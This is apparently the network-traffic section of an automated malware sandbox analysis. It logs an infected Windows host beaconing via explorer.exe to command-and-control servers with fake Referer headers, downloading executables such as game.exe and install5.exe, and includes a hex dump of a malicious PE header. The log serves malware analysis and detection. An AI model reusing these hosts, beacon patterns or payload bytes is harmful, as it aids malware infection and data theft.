                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          18192.168.2.34975731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.669245005 CET1481OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://hwkkkbswtf.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 357
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.744937897 CET1481INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          19192.168.2.34975831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.821760893 CET1482OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://rtxigbrl.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 170
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.902015924 CET1483INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 37I:82OR%@_M-\z.TKC0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          2192.168.2.34983167.199.248.15443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          20192.168.2.34976431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.620800972 CET1606OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://yxkmtikn.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 120
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.699898958 CET1620INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:52 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          21192.168.2.34976531.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.775074005 CET1622OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://piydputbq.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 237
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.853043079 CET1624INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:52 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2eI:82OO~kEKg2P0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          22192.168.2.34976854.38.220.8580C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.916930914 CET1631OUTGET /install5.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: unicupload.top
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.934916973 CET1632INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:21:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 178
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          23192.168.2.34977031.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.181544065 CET1647OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://lrbpoemjfa.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 126
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.268659115 CET1673INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:54 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          24192.168.2.34977131.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.345000029 CET1675OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://xdctril.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 357
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.429977894 CET1715INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:54 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          25192.168.2.34977331.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.522526979 CET1717OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://edvbcrjk.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 217
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.602376938 CET1719INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:54 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          26192.168.2.34977631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.681102991 CET1721OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://ghfptm.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 341
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.759599924 CET1728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:54 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 30I:82OR&:UPJ$dP0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          27192.168.2.34978031.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.145565987 CET1767OUTGET /game.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: data-host-coin-8.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.203516006 CET1769INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:55 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Content-Length: 350720
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Last-Modified: Fri, 31 Dec 2021 18:22:02 GMT
                                                                                                                                                                                                          ETag: "55a00-5d4753f5484a9"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 17 37 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 20 04 00 00 d6 33 00 00 00 00 00 40 56 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 67 a4 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 1d 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 4c 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 1e 04 00 00 10 00 00 00 20 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 69 78 69 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 02 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 20 04 00 de 20 04 00 f2 20 04 00 08 21 04 00 18 21 04 00 2e 21 04 00 3e 21 04 00 5a 21 04 00 6e 21 04 00 84 21 04 00 9e 21 04 00 b8 21 04 00 d0 21 04 00 e4
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#OB!B!B!B!4B!4B!:B!B (B!4B!4B!4B!RichB!PEL7_ 3@V0@ 8g(p7N7L"0@.text& `.data*30$@.cixi`7@.rsrcNp7P@@.relocV7X@B !!.!>!Z!n!!!!!


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          28192.168.2.34978731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.853857994 CET2405OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://yntwmx.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 222
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.933060884 CET2406INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:56 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          29192.168.2.34978831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.015832901 CET2408OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://smhel.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 126
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.094630957 CET2414INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:57 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
